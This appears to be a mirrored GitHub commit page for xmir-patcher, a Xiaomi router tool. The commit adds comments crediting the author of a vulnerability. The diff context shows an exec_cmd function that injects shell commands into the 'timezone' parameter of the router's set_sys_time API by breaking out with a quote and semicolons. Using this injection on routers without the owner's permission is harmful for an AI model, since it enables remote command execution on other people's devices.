mirror of
https://github.com/openwrt-xiaomi/xmir-patcher.git
synced 2026-09-22 22:57:55 +03:00
connect: Update vulnerabilities and exploits info
This commit is contained in:
@@ -46,6 +46,10 @@ stok = gw.web_login()
|
||||
|
||||
|
||||
def exec_cmd(cmd, api = 'API/misystem/set_sys_time'):
|
||||
######
|
||||
# vuln/exploit author: remittor
|
||||
# publication: https://forum.openwrt.org/t/125008/132
|
||||
######
|
||||
resp = gw.api_request(api, { 'timezone': " ' ; " + cmd + " ; " })
|
||||
return resp
|
||||
|
||||
|
||||
Reference in New Issue
Block a user